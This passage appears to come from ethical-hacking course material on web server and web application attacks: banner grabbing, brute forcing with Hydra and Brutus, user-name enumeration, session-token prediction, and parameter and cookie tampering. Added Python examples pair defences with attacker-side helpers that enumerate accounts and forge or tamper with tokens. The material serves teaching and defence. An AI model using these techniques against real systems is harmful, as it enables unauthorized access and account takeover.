Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also identify the different services running on the web server and give detailed information about the remote computers.
[Screenshot: Zenmap scan of google.com showing 80/tcp open http, 113/tcp closed ident, 443/tcp open https]
Footprint Web Infrastructure: Server Identification/Banner Grabbing

Analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers select exploits from vulnerability databases to attack a web server and its applications.
C:\>telnet www.juggyboy.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server:
Date: Thu, 07 Jul 2005 13:08:16 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGKOFFIPOLHPLNE; path=/
Via: 1.1 Application and Content Networking System Software 5.1.15
Connection: Close

Connection to host lost.
C:\>

(The Server header value is blank in the capture; the figure's annotation identifies the server as Microsoft IIS, which the ASPSESSIONID cookie also gives away.)
Banner grabbing tools:
1. Telnet
2. Netcat
3. ID Serve
4. Netcraft
FIGURE 13.33: Server Identification/Banner Grabbing
Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application
It allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.
Web Spidering

Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Tools that can be used to discover hidden content by means of web spidering include:
  OWASP Zed Attack Proxy
  Burp Spider
  WebScarab
Brute Forcing
Brute forcing is a very popular and easy method to attack web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.
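Spidering and name guessing only find what is actually sitting in the served directory, so the cheapest defence is to audit the web root from the inside before an attacker enumerates it from the outside. The following is an added example, not code from the EC-Council material: it walks a directory tree and reports the backup copies, editor leftovers, archives and configuration or version-control directories listed earlier in this section. The name patterns and the throwaway sample tree it builds are assumptions of the example.

```python
import os
import tempfile

# Name patterns that mark backups, editor leftovers, archives and configuration that
# should never sit under a served directory. Constructed for this example; extend
# it with your own stack's artefact names.
RISKY_SUFFIXES = (".bak", ".old", ".orig", ".swp", ".tmp", "~", ".zip", ".tar.gz", ".sql", ".log")
RISKY_NAMES = {".env", ".git", ".svn", ".htpasswd", "web.config.bak", "phpinfo.php"}

def _rel(webroot, dirpath, name):
    """Path relative to the web root, with forward slashes as a URL would use."""
    return os.path.relpath(os.path.join(dirpath, name), webroot).replace(os.sep, "/")

def audit_webroot(webroot):
    """Walk a served directory tree and return (relative path, reason) pairs for
    content that a spider or name-guessing tool could fetch but should not exist."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        for name in list(dirnames):
            if name in RISKY_NAMES:
                findings.append((_rel(webroot, dirpath, name), "sensitive directory"))
                dirnames.remove(name)          # one finding per tree is enough
        for name in filenames:
            if name in RISKY_NAMES:
                findings.append((_rel(webroot, dirpath, name), "sensitive file"))
            elif name.lower().endswith(RISKY_SUFFIXES):
                findings.append((_rel(webroot, dirpath, name), "backup or leftover file"))
    return sorted(findings)

def build_sample_webroot():
    """Create a throwaway directory tree (constructed) mirroring a careless deployment."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel in ("index.html", "login.php", "login.php.bak", "includes/db.inc.old",
                ".env", "backup/site.zip", "images/logo.png", ".git/HEAD"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
    return root

if __name__ == "__main__":
    for path, reason in audit_webroot(build_sample_webroot()):
        print(f"{reason:25} {path}")
```

Run it against the real document root as part of deployment; anything it reports is exactly what a wordlist-driven request tool would find, only without the noise of thousands of 404s in the access log.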
[Screenshot: Burp Suite Intruder, showing the attack type, the payload positions, and a captured GET request to ts4.mm.bing.net used as the base request]
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available.
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled.
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions.
[Screenshot: Mozenda Web Agent Builder (WebAgent1, not saved) capturing review ratings, review text, and "Would recommend" answers from a product-review page]
Hacking Webservers
5. Once the attacker identifies the web server environment, he or she scans for known vulnerabilities using a web server vulnerability scanner. Vulnerability scanning helps the attacker launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker has gathered all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.
[Screenshot accompanying the vulnerability-scanning step; illegible in the scan apart from the URL https://download.hpsmartupdate.com]

Attack Web Servers
Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Map the Attack Surface: identify the various attack surfaces uncovered by the application and the vulnerabilities that are associated with each one.
Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers
Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.

Tools used:
  Burp Suite
  HttPrint
  WebScarab
  OWASP Zed Attack Proxy
Perform detailed server fingerprinting: analyze HTTP headers and HTML source code to identify server-side technologies.

Examine URLs for file extensions, directories, and other identification information.

Example error page: http://juggyboy.com/error.aspx (server banner: Microsoft-IIS/6.0)

Server Error in '/ReportServer' Application.
Could not find the permission set named 'ASP.Net'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Version Information: Microsoft .NET Framework Version 4.0.30319; ASP.NET Version 4.0.30319.1
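The banner-grabbing session in Figure 13.33 and the error page above both come down to reading what a server volunteers, and the same code a tester uses to collect it is what an administrator should run against their own servers to see what needs suppressing. The following is an added example, not code from the EC-Council material: it sends the same HEAD / HTTP/1.0 request to a throwaway local http.server instance, parses the reply, and reports which headers, session-cookie names, URL extensions and error-page text disclose the platform or an exact version. The constructed SAMPLE_RESPONSE is modelled on the figure and the error page shown above; the Microsoft-IIS/6.0 Server value, the hint tables and the local server are assumptions of the example.

```python
import re
import socket
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler

def grab_banner(host, port, timeout=3.0):
    """Send the same HEAD request as the telnet session above and return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii"))
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")

def parse_response(raw):
    """Split a raw HTTP response into status line, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), value.strip())
    return {"status": lines[0], "headers": headers, "body": body}

VERSION = re.compile(r"\d+(?:\.\d+)+")
EXT_HINTS = {".aspx": "ASP.NET", ".asp": "Classic ASP", ".jsp": "Java/JSP",
             ".php": "PHP", ".do": "Java/Struts", ".cfm": "ColdFusion"}

def fingerprint(url, response):
    """Collect what headers, cookies, the URL extension and error-page text
    disclose about the server-side technology."""
    h = response["headers"]
    hints = {name: h[name] for name in ("server", "x-powered-by", "x-aspnet-version", "via")
             if name in h}
    cookie = h.get("set-cookie", "").upper()
    if cookie.startswith("ASPSESSIONID"):
        hints["cookie"] = "ASPSESSIONID (IIS / classic ASP)"
    elif cookie.startswith("JSESSIONID"):
        hints["cookie"] = "JSESSIONID (Java servlet container)"
    elif cookie.startswith("PHPSESSID"):
        hints["cookie"] = "PHPSESSID (PHP)"
    path = url.split("?", 1)[0].lower()
    for ext, tech in EXT_HINTS.items():
        if path.endswith(ext):
            hints["url-extension"] = tech
    m = re.search(r"Version Information:\s*([^<\n]+)", response["body"])
    if m:
        hints["error-page"] = m.group(1).strip()
    return hints

def version_leaks(hints):
    """Names of the hints that reveal an exact version number, the detail a
    defender most wants removed from responses."""
    return sorted(name for name, value in hints.items() if VERSION.search(value))

# Constructed response modelled on Figure 13.33 and the error page shown above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Date: Thu, 07 Jul 2005 13:08:16 GMT\r\n"
    "Content-Length: 1270\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGKOFFIPOLHPLNE; path=/\r\n"
    "Via: 1.1 Application and Content Networking System Software 5.1.15\r\n"
    "Connection: Close\r\n\r\n"
    "<html><body>Server Error in '/ReportServer' Application. "
    "Version Information: Microsoft .NET Framework Version 4.0.30319; "
    "ASP.NET Version 4.0.30319.1</body></html>"
)

class _QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, *args):      # keep the demo server silent
        pass

def start_local_server():
    """Start a throwaway HTTP server on 127.0.0.1 so the banner grab can run offline."""
    server = HTTPServer(("127.0.0.1", 0), _QuietHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

if __name__ == "__main__":
    hints = fingerprint("http://juggyboy.com/error.aspx", parse_response(SAMPLE_RESPONSE))
    print(hints, "leaks:", version_leaks(hints))
    server = start_local_server()
    reply = parse_response(grab_banner("127.0.0.1", server.server_address[1]))
    server.shutdown()
    server.server_close()
    print(reply["status"], reply["headers"].get("server"))
```

On the sample the version leaks come from three places at once (Server, Via and the unhandled-exception page), which is the usual picture: stripping the Server header alone does little while the proxy chain and the default error page keep talking.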
Examine pagesource and URLs and make an educated guess to determine the internal structure and functionality of web applications
Tools used:
  GNU Wget
  Teleport Pro
  BlackWidow

Examine URL: SSL, ASPX Platform
Source: http://www.gnu.org
GNU W get is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.
Teleport Pro

Source: http://www.tenmax.com

Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering, with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.

BlackWidow

Source: http://softbytelabs.com

BlackWidow scans a site and creates a complete profile of the site's structure, files, external links, and even link errors. BlackWidow will download all file types, such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, and HTM, to MIME types from any website. Download videos and save them in many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, WMV, ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter.

Examine URL: SSL, ASPX Platform

If a page URL starts with https instead of http, it is known as an SSL-certified page. If a page has an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBY, you can assume that the application uses a database and displays the data by that value.
Information                      Attack
Client-Side Validation           Injection Attack, Authentication Attack
Database Interaction             SQL Injection, Data Leakage
File Upload and Download         Directory Traversal
Display of User-Supplied Data    Cross-Site Scripting
Dynamic Redirects                Redirection, Header Injection
Login                            Username Enumeration, Password Brute-Force
Session State                    Session Hijacking, Session Fixation
Email Interaction                Email Injection
Cleartext Communication          Data Theft, Session Hijacking
Error Message                    Information Leakage
Access Controls                  Privilege Escalation
Application Codes                Buffer Overflows
Third-Party Application          [illegible in scan]
Web Server Software              [illegible in scan]
Verbose error messages shown on the slide: "The password provided is incorrect" and "Account <username> has been locked out".

Predictable User Names

Some applications automatically generate account user names according to a predictable sequence. This makes it very easy for an attacker who can discern the sequence to compile a potentially exhaustive list of all valid user names.
Password Attacks

Passwords are cracked based on:
  Password functionality exploits
  Password guessing
  Brute-force attacks

Session Attacks

The following are the types of session attacks employed by the attacker to attack the authentication mechanism:
  Session prediction
  Session brute-forcing
  Session poisoning

Cookie Exploitation

The following are the types of cookie exploitation attacks:
  Cookie poisoning
  Cookie sniffing
  Cookie replay
If login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method
Note: User name enumeration from verbose error messages will fail if the application implements account lockout policy i.e., locks account after a certain number of failed login attempts
Screenshot: two WordPress.com login forms (fields "Email or Username", "Password", "Remember Me", "Log In"). The first, submitted with the user name rini.matthews, returns "ERROR: The password you entered for the email or username rinimatthews is incorrect. Lost your password?", confirming that the account exists.
Some applications automatically generate account user names based on a sequence (such as user101, user102, etc.), and attackers can determine the sequence and enumerate valid user names.
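The following is an added example, not part of the course material, showing the enumeration above in code: a login endpoint with the verbose message from the WordPress.com screenshot, the generic-message fix, and the attacker-side probe that tells them apart. The user store, password hashes and candidate list are constructed for the demo; the hardened version also hashes a dummy credential for unknown users so that response timing does not leak what the message no longer does.

```python
import hashlib
import hmac
import os


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


_SALT = os.urandom(16)
# Constructed user store: user name -> (salt, PBKDF2 hash). Not the page's data.
USERS = {
    "rini.matthews": (_SALT, _hash("correct horse", _SALT)),
    "jason": (_SALT, _hash("s3cret", _SALT)),
}
# Dummy credential so an unknown user costs the same work as a known one
_DUMMY = (_SALT, _hash("dummy", _SALT))


def login_verbose(username, password):
    """Vulnerable: the message says which half of the credentials was wrong."""
    if username not in USERS:
        return "ERROR: Invalid username."
    salt, stored = USERS[username]
    if hmac.compare_digest(stored, _hash(password, salt)):
        return "OK"
    return f"ERROR: The password you entered for the username {username} is incorrect."


def login_generic(username, password):
    """Hardened: one message and the same amount of work on every failure path."""
    salt, stored = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(stored, _hash(password, salt)) and username in USERS
    return "OK" if ok else "ERROR: Invalid username or password."


def enumerate_users(login, candidates, probe_password="x"):
    """Attacker side: log in once with a name that cannot exist to learn the
    'unknown user' response, then keep every candidate whose response differs."""
    baseline = login("no-such-user-" + os.urandom(4).hex(), probe_password)
    return [u for u in candidates if login(u, probe_password) != baseline]


# Constructed candidate list, including sequential names of the kind the text mentions
CANDIDATES = ["admin", "jason", "rini.matthews", "user101", "user102"]

if __name__ == "__main__":
    print("verbose endpoint leaks:", enumerate_users(login_verbose, CANDIDATES))
    print("generic endpoint leaks:", enumerate_users(login_generic, CANDIDATES))
```

Against the verbose endpoint the probe returns exactly the accounts that exist; against the generic one it returns nothing, because every failure looks the same and costs the same.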
Password Changing
Determine the password change functionality within the application by spidering the application or creating a login account. Try random strings for the Old Password, New Password, and Confirm New Password fields and analyze the errors to identify vulnerabilities in the password change functionality (for example, whether the old password is actually verified, or whether the error reveals that only the old password was wrong).

Password Recovery
"Forgot Password" features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the challenge answer with the help of social engineering. Applications may also send a unique recovery URL, or even the existing password, to an email address specified by the attacker once the challenge is solved.

Remember Me Exploit
"Remember Me" functions are sometimes implemented with a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010. Attackers can use an enumerated user name or predict the identifier to bypass the authentication mechanism.
Tools

Password Dictionary
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra, etc.
The attacker obtains the correct password using a password list, a password dictionary, and various tools.
Attackers create a list of possible passwords from the most commonly used passwords, from footprinting the target, and from social engineering, then try each password until the correct one is discovered.
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.
THC-Hydra
Source: http://www.thc.org
THC-Hydra is a network logon cracker that supports many different services. The tool is proof-of-concept code, written to give researchers and security consultants a way to show how easy it would be to gain unauthorized remote access to a system.
HydraGTK screenshot (Target / Passwords / Tuning / Specific / Start tabs): target 127.0.0.1, service ftp, Username: testuser, Password List: /tmp/passlist.txt, options "Try login as password" and "Try empty password" enabled. Output pane:

Hydra v4.1 (c) 2004 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2004-05-17 21:58:52
[DATA] 32 tasks, 1 servers, 45380 login tries (l:1/p:45380), ~1418 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 14056.00 tries/min, 14056 tries in 00:01h, 31324 todo in 00:03h
[STATUS] 14513.00 tries/min, 29026 tries in 00:02h, 16354 todo in 00:02h
[21][ftp] host: 127.0.0.1   login: marc   password: success
Hydra (http://www.thc.org) finished at 2004-05-17 22:01:38
In addition to these tools, Burp Intruder (part of Burp Suite) is also used for password guessing.
Burp Suite screenshot: Intruder tab (positions / payloads / options) with the "brute forcer" payload type selected, character set abcdefghijklmnopqrstuvwxyz0123456789, minimum and maximum length settings, and a payload count in the millions.
Brutus
Source: http://www.hoobie.net
Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.
Brutus AET2 screenshot (www.hoobie.net/brutus, January 2000): Type HTTP (Basic Auth), Target 127.0.0.1, "Use Username" with user file users.txt, options Timeout, Retries, Throttle and Quick Kill. Log: "Opened user file containing 6 users. Opened password file containing 818 passwords." Positive authentication results list 127.0.0.1/ HTTP (Basic Auth) with password "academic".
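Hydra and Brutus leave a very recognisable footprint in authentication logs. The following is an added example, not part of the course material, of the detection side: it tags each source IP as brute force (many failures against one or two accounts), password spray (many accounts, one or two tries each) or a success that follows a failure burst. The log format "<date> <time> <ip> <user> <RESULT>" and every line in SAMPLE_LOG are constructed for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

_BASE = datetime(2004, 5, 17, 21, 58, 52)


def _line(offset_s, ip, user, result):
    ts = _BASE + timedelta(seconds=offset_s)
    return f"{ts:%Y-%m-%d %H:%M:%S} {ip} {user} {result}"


# Constructed sample: a brute force against 'marc', a spray across many users,
# and a normal user who mistypes twice. Not real log data.
SAMPLE_LOG = "\n".join(
    [_line(i, "203.0.113.7", "marc", "FAIL") for i in range(25)]
    + [_line(25, "203.0.113.7", "marc", "SUCCESS")]
    + [_line(30 + i, "198.51.100.9", f"user{101 + i}", "FAIL") for i in range(8)]
    + [_line(40, "10.0.0.5", "alice", "FAIL"),
       _line(45, "10.0.0.5", "alice", "FAIL"),
       _line(50, "10.0.0.5", "alice", "SUCCESS")]
)


def parse(log):
    """Returns (timestamp, ip, user, result) tuples for the assumed log format."""
    events = []
    for line in log.splitlines():
        date, time_, ip, user, result = line.split()
        events.append((datetime.fromisoformat(f"{date} {time_}"), ip, user, result))
    return events


def detect(events, window=timedelta(minutes=5), fail_threshold=20, spray_users=5):
    """Tag each source IP with the guessing patterns seen inside a sliding window:
    'brute_force'             many failures against at most two accounts
    'password_spray'          many distinct accounts with fewer than 3 tries each
    'success_after_failures'  a SUCCESS preceded by 5+ failures from the same IP"""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        tags = set()
        for i, (ts, _, _, result) in enumerate(evs):
            recent = [e for e in evs[:i + 1] if e[0] >= ts - window]
            fails = [e for e in recent if e[3] == "FAIL"]
            targets = {e[2] for e in fails}
            if len(fails) >= fail_threshold and len(targets) <= 2:
                tags.add("brute_force")
            if len(targets) >= spray_users and len(fails) / len(targets) < 3:
                tags.add("password_spray")
            if result == "SUCCESS" and len(fails) >= 5:
                tags.add("success_after_failures")
        if tags:
            findings[ip] = tags
    return findings


if __name__ == "__main__":
    for ip, tags in detect(parse(SAMPLE_LOG)).items():
        print(ip, sorted(tags))
```

The thresholds are starting points, not universal constants: a spray from a botnet spreads one try per IP, so the same logic should also be run keyed on the account rather than the source address.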
Session ID Prediction
Vulnerable session generation mechanisms that compose session IDs from the user name or other predictable information, such as a timestamp or the client IP address, can be exploited by simply guessing valid session IDs.

Request:

GET http://janaina:8180/WebGoat/attack?Screen=17&menu=410 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Referer: http://janaina:8180/WebGoat/attack?Screen=17&menu=410
Cookie: JSESSIONID=user01
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

For many web applications the session ID is a string of fixed width; randomness is essential to prevent prediction. In the request above the session ID variable is JSESSIONID and its value is "user01", which is simply the user name. By guessing the next value, "user02", the attacker gains unauthorized access to another user's session.
Cookies carry credentials or session identifiers, so an attacker who traps and manipulates them can obtain passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include OWASP Zed Attack Proxy, Burp Suite, etc.

OWASP Zed Attack Proxy
Source: https://www.owasp.org
OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
OWASP ZAP screenshot: "Untitled Session - OWASP ZAP", Sites tree showing a Yahoo trading URL, Request / Response / Break tabs with the captured request headers (User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4), and the Spider and Alerts panels (Current Scans: 0).
Authorization Attack
In an authorization attack, the attacker first obtains the lowest-privileged account, logs in as a legitimate user, and then escalates privileges step by step to access protected resources. Attackers manipulate HTTP requests to subvert the application's authorization scheme by modifying input fields that relate to the user ID, user name, access group, cost, filenames, file identifiers, etc. The request elements attackers manipulate in authorization attacks include the URI, parameters (parameter tampering), POST data, HTTP headers, the query string, cookies, and hidden tags.
Parameter Tampering
Parameter tampering is an attack based on the manipulation of parameters exchanged between client and server in order to modify application data, such as the price and quantity of products, permissions, and user credentials. This information is usually stored in cookies, URL query strings, or hidden form fields, and tampering with it is used to gain control over application functionality.

POST Data
POST data often carries authorization and session information, since in most applications the information provided by the client must be associated with the session that provided it. An attacker who finds that the application trusts this data can manipulate the POST data and the information in it.
URI and Query String examples:
http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com
https://juggyshop.com/books/download/852741369.pdf
https://juggybank.com/login/home.jsp?admin=true

POST Data
Attackers can use web spidering tools such as Burp Suite to scan the web application for POST parameters.

HTTP Headers
If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionality:

GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin=False

ItemID=201 is not accessible because the Admin parameter in the Referer is set to False; the attacker changes it to True and accesses the protected item. The Referer header is set by the browser and trivially rewritten through an intercepting proxy, so it must never be an input to an access control decision.
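The following is an added example, not part of the course material, that puts the admin=true query parameter and the Referer: ...?Admin=False cases side by side in code: one download handler decides from what the client sends, the other derives the user from the session cookie and looks the role up on the server. Sessions, roles, items and the request dictionaries are all constructed for the demo.

```python
# Server-side state (constructed for the demo)
SESSIONS = {"sid-jason": "jason", "sid-alice": "alice"}   # session id -> user
ROLES = {"jason": "user", "alice": "admin"}                # user -> role
ITEMS = {
    201: {"name": "admin-report.pdf", "admin_only": True},
    100: {"name": "brochure.pdf", "admin_only": False},
}


def make_request(item_id, sid, admin=None, referer=None):
    """Minimal stand-in for a parsed HTTP request."""
    params = {"ItemID": str(item_id)}
    if admin is not None:
        params["admin"] = admin
    headers = {"Referer": referer} if referer else {}
    return {"params": params, "headers": headers, "cookies": {"JSESSIONID": sid}}


def _item(req):
    try:
        return ITEMS.get(int(req["params"].get("ItemID", "")))
    except ValueError:
        return None


def download_vulnerable(req):
    """Decides from client-controlled inputs: a query parameter and the Referer header."""
    item = _item(req)
    if item is None:
        return 404, None
    is_admin = (req["params"].get("admin", "false").lower() == "true"
                or "Admin=True" in req["headers"].get("Referer", ""))
    if item["admin_only"] and not is_admin:
        return 403, None
    return 200, item["name"]


def download_hardened(req):
    """Identity comes only from the session cookie; the role is looked up server
    side, so nothing in the query string or headers can change it."""
    user = SESSIONS.get(req["cookies"].get("JSESSIONID"))
    if user is None:
        return 401, None
    item = _item(req)
    if item is None:
        return 404, None
    if item["admin_only"] and ROLES.get(user) != "admin":
        return 403, None
    return 200, item["name"]


if __name__ == "__main__":
    tampered = make_request(201, "sid-jason", admin="true")
    print("vulnerable:", download_vulnerable(tampered))
    print("hardened:  ", download_hardened(tampered))
```

The hardened handler still serves item 201 to alice, whose server-side role is admin, and the public item to everyone; it simply ignores the two inputs the attacker can write.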
Cookie Tampering
Attackers tamper with cookies set by the web application in order to attack it. In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism. The attacker then traps cookies set by the web application, tampers with their parameters using an intercepting proxy such as OWASP Zed Attack Proxy or Paros Proxy, and replays them to the application.
Source: https://www.owasp.org
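Both the RememberUser=jason cookie in the "Remember Me Exploit" passage and the cookie tampering described here work because the cookie's contents are trusted as sent. The following is an added example, not part of the course material, of a tamper-evident cookie: the payload is signed with HMAC-SHA256 and carries an expiry, so a changed field or a forged value is rejected. SECRET_KEY, the field layout user|role|expiry and the tamper helper are assumptions made for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import time

SECRET_KEY = b"demo-only: replace with a random per-deployment secret"  # assumption


def _sign(payload):
    return hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()


def make_cookie(user, role, ttl_seconds=14 * 24 * 3600, now=None):
    """Value = base64(user|role|expiry) '.' base64(HMAC-SHA256(secret, payload))."""
    exp = int(now if now is not None else time.time()) + ttl_seconds
    payload = f"{user}|{role}|{exp}".encode()
    return (base64.urlsafe_b64encode(payload).decode() + "."
            + base64.urlsafe_b64encode(_sign(payload)).decode())


def verify_cookie(cookie, now=None):
    """Returns (user, role), or None if the cookie is malformed, forged,
    tampered with, or expired. The signature is checked before anything is parsed."""
    try:
        p_b64, s_b64 = cookie.split(".", 1)
        payload = base64.urlsafe_b64decode(p_b64)
        sig = base64.urlsafe_b64decode(s_b64)
        if not hmac.compare_digest(sig, _sign(payload)):
            return None
        user, role, exp = payload.decode().split("|")
        if int(exp) < (now if now is not None else time.time()):
            return None
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None
    return user, role


def tamper(cookie, old, new):
    """Attacker side: decode the payload, edit a field, re-encode, keep the old signature."""
    p_b64, s_b64 = cookie.split(".", 1)
    payload = base64.urlsafe_b64decode(p_b64).decode().replace(old, new).encode()
    return base64.urlsafe_b64encode(payload).decode() + "." + s_b64


if __name__ == "__main__":
    c = make_cookie("jason", "user")
    print("genuine:", verify_cookie(c))
    print("edited :", verify_cookie(tamper(c, "|user|", "|admin|")))
    print("forged :", verify_cookie("RememberUser=jason"))
```

A signed cookie stops tampering and forgery but cannot be revoked before it expires; where logout or password change must invalidate "remember me", store a random opaque token server side and keep nothing meaningful in the cookie at all.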
Once the attacker has obtained or generated a valid session token, the attacker tries to exploit the application's session token handling in the following ways: session hijacking, session replay, and man-in-the-middle attacks.
Session Token Prediction
Attackers obtain valid session tokens by sniffing the traffic or by legitimately logging into the application, and analyze them for encoding (hex-encoding, Base64) or any pattern. If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the tokens recently issued to other application users. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine which predicted tokens are valid sessions.
Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

The token is just the hex (percent) encoding of the ASCII string user=jason;app=admin;date=23/11/2010. The attacker can predict another session token by changing the date alone and use it for another transaction with the server; since the user and app fields are in the attacker's hands as well, any user or role can be claimed the same way.
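The following is an added example, not part of the course material, that serves both the JSESSIONID=user01 case above and the percent-encoded SessionToken example: it decodes a token (percent, hex or Base64), forges a new one by changing a field, flags a token sample that steps sequentially, and shows what a token should look like instead. The hex and sequential samples are constructed; the percent-encoded token is the page's own.

```python
import base64
import binascii
import re
import secrets
from urllib.parse import unquote


def decode_token(token):
    """Try percent-encoding, raw hex and Base64 in turn.
    Returns (encoding, plaintext) or (None, token) when nothing readable comes out."""
    if "%" in token:
        return "percent", unquote(token)
    if len(token) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", token):
        try:
            text = bytes.fromhex(token).decode()
            if text.isprintable():
                return "hex", text
        except (ValueError, UnicodeDecodeError):
            pass
    try:
        text = base64.b64decode(token, validate=True).decode()
        if text.isprintable():
            return "base64", text
    except (binascii.Error, UnicodeDecodeError):
        pass
    return None, token


def forge_token(token, field, new_value):
    """Attacker side: rewrite one key=value field of a structured token and re-encode
    it exactly as the application does, so the server accepts it."""
    enc, text = decode_token(token)
    if enc is None:
        raise ValueError("token structure not understood")
    fields = dict(kv.split("=", 1) for kv in text.split(";"))
    fields[field] = new_value
    text = ";".join(f"{k}={v}" for k, v in fields.items())
    if enc == "percent":
        return "".join(f"%{b:02X}" for b in text.encode())
    if enc == "hex":
        return text.encode().hex()
    return base64.b64encode(text.encode()).decode()


def looks_sequential(samples):
    """True when every token ends in a number and consecutive numbers step by a
    constant (user01, user02, ...), i.e. the next token is trivially predictable."""
    matches = [re.search(r"(\d+)$", s) for s in samples]
    if len(samples) < 3 or not all(matches):
        return False
    nums = [int(m.group(1)) for m in matches]
    return len({b - a for a, b in zip(nums, nums[1:])}) == 1


def new_session_id():
    """What the server should issue instead: 256 bits from a CSPRNG, no structure."""
    return secrets.token_urlsafe(32)


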